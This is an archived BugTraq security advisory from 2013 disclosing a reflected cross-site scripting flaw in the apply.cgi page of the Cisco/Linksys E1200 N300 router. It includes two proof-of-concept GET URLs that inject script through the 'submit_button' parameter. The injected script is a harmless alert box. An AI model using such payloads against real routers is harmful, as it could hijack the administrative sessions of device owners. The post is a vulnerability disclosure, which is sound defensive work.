BugTraq
Cisco/Linksys E1200 N300 Reflected XSS Apr 29 2013 07:27AM
Carl Benedict (theinfinitenigma gmail com) (1 replies)
Summary
--------------------
Software : Cisco/Linksys Router OS
Hardware : E1200 N300 (others currently untested)
Version : 2.0.04 (others currently untested)
Website : http://www.linksys.com
Issue : Reflected XSS
Severity : Medium
Researcher: Carl Benedict (theinfinitenigma)

Product Description
--------------------
The Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access point, and 10/100 switch.

Details
--------------------
The apply.cgi page, which backs all HTML forms on the device, is vulnerable to reflected XSS via the 'submit_button' parameter. The vulnerability is caused due to a lack of input validation and poor/missing server side validation checks. This attack requires an authenticated session. This application uses HTTP basic authentication. Because of this, there is no session, which increases the likelihood of this attack being successful.

Sample URL #1 (HTTP GET request):

http://192.168.1.1/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Csc
ript%3Ealert%281%29%3C%2fscript%3E%20%27

Sample URL #2 (HTTP GET request):

http://192.168.1.1/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72
%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63
%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto
=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_rebo
ot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan
_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_dem
and_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_ho
stname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_i
paddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco100
02&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=
0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1
_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wa
n_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=
0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

History
--------------------
04/26/2013 : Discovery
04/27/2013 : Advisory released

--
â??

[ reply ]
Re: Cisco/Linksys E1200 N300 Reflected XSS Jul 10 2013 02:44AM
the infinitenigma (theinfinitenigma gmail com)


 

Privacy Statement
Copyright 2010, SecurityFocus